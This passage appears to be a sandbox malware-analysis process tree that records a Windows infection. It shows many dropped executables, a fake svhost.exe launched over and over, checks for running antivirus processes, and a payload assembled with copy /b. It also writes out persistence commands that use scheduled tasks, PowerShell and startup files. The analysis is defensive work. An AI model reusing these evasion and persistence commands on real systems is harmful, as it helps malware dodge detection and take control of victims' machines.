  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2928
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5436
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3560
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:1352
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4788
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:1360
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2152
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5812
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:484
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3360
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5232
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3240
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:1224
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5748
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5632
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4060
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3892
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5860
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4812
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4680
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2672
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3256
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5964
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5896
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2036
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:1352
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3744
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3724
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4564
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2796
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5632
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4380
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4992
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:1080
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4276
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5372
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:1208
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4240
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4148
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2052
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2140
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3548
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5964
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5080
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2640
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4700
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2340
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2616
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3588
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5328
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2556
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4296
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:660
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2988
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2808
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:1424
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5740
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4680
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5912
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4604
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2380
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3360
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3080
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5468
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2816
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5264
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:892
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3628
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:236
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5028
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2552
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2372
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4412
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5680
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4380
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2988
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5224
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3488
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5852
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5380
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4648
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3292
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:1488
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:1432
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:1300
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5232
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3540
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2552
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3856
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4148
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5772
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4636
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3924
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:1300
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5268
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2144
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:6020
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3268
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5360
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5868
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3352
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2808
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:988
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5992
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3968
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4080
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5740
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5376
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5964
- - C:\Users\Admin\AppData\Local\Temp\Files\utility-inst.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\utility-inst.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1812
  - - C:\Users\Admin\AppData\Local\Temp\is-ILHL0.tmp\utility-inst.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-ILHL0.tmp\utility-inst.tmp" /SL5="$1002F6,922170,832512,C:\Users\Admin\AppData\Local\Temp\Files\utility-inst.exe"
      4⤵
      PID:1052
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-1542C.tmp\do.bat""
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2140
- - C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1904
- - C:\Users\Admin\AppData\Local\Temp\Files\GuidanceConnectors.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\GuidanceConnectors.exe"
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:5556
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy Frequently Frequently.cmd & Frequently.cmd
      4⤵
      PID:2588
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:2096
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        5⤵
        
        PID:3560
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:5176
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1224
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 390641
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2384
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "ConventionTroopsStudiedTooth" Version
        5⤵
        
        PID:3968
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Accessing + ..\Entire + ..\Peripherals + ..\Et B
        5⤵
        
        PID:1892
    - - C:\Users\Admin\AppData\Local\Temp\390641\Imposed.com
        
        Imposed.com B
        5⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5268
      - C:\Users\Admin\AppData\Local\Temp\390641\Imposed.com
        
        C:\Users\Admin\AppData\Local\Temp\390641\Imposed.com
        6⤵
        Checks SCSI registry key(s)
        
        PID:2320
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        
        PID:6132
- - C:\Users\Admin\AppData\Local\Temp\Files\300.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\300.exe"
    3⤵
    - Suspicious use of SetThreadContext
    PID:2052
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:5752
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5752 -s 2088
        5⤵
        Program crash
        
        PID:5624
- - C:\Users\Admin\AppData\Local\Temp\Files\bp.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\bp.exe"
    3⤵
    PID:5264
- - C:\Users\Admin\AppData\Local\Temp\Files\CleanerV2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\CleanerV2.exe"
    3⤵
    PID:3780
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "CleanerV2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1052
  - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
      4⤵
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      PID:4112
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "CleanerV2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2556
- - C:\Users\Admin\AppData\Local\Temp\Files\npp.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1612
  - - C:\Users\Admin\AppData\Local\Temp\47246310.exe
      C:\Users\Admin\AppData\Local\Temp\47246310.exe
      4⤵
      PID:5312
- - C:\Users\Admin\AppData\Local\Temp\Files\Unit.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Unit.exe"
    3⤵
    PID:3544
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3544 -s 448
      4⤵
      Program crash
      PID:5544
- - C:\Users\Admin\AppData\Local\Temp\Files\NoEscape.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\NoEscape.exe"
    3⤵
    - Modifies WinLogon for persistence
    - UAC bypass
    - Disables RegEdit via registry modification
    - Checks whether UAC is enabled
    - Drops desktop.ini file(s)
    - Modifies WinLogon
    - Sets desktop wallpaper using registry
    - Drops file in Windows directory
    - Modifies Control Panel
    - System policy modification
    PID:972
- - C:\Users\Admin\AppData\Local\Temp\Files\Discord3.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Discord3.exe"
    3⤵
    PID:4380
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit
      4⤵
      PID:3744
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3560
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5BAC.tmp.bat""
      4⤵
      PID:3628
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:236
    - - C:\Users\Admin\AppData\Roaming\Discord.exe
        
        "C:\Users\Admin\AppData\Roaming\Discord.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1896
- - C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5072
- - C:\Users\Admin\AppData\Local\Temp\Files\Documents.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Documents.exe"
    3⤵
    PID:5380
- - C:\Users\Admin\AppData\Local\Temp\Files\1111.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\1111.exe"
    3⤵
    PID:1060
- - C:\Users\Admin\AppData\Local\Temp\Files\kldrgawdtjawd.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\kldrgawdtjawd.exe"
    3⤵
    - Checks processor information in registry
    PID:2796
- - C:\Users\Admin\AppData\Local\Temp\Files\wow.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\wow.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1848
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:3732
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:4172
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:5020
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:4796
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:2972
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:4540
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:5428
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:4852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5740
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:2156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5904
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:6072
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  PID:492
- C:\Windows\SysWOW64\cmd.exe
  cmd /c schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F
  2⤵
  PID:1672
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:700
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url" & echo URL="C:\Users\Admin\AppData\Local\SkySync Technologies\SkySync.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url" & exit
  2⤵
  - Drops startup file
  PID:5456
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2772
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:2980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
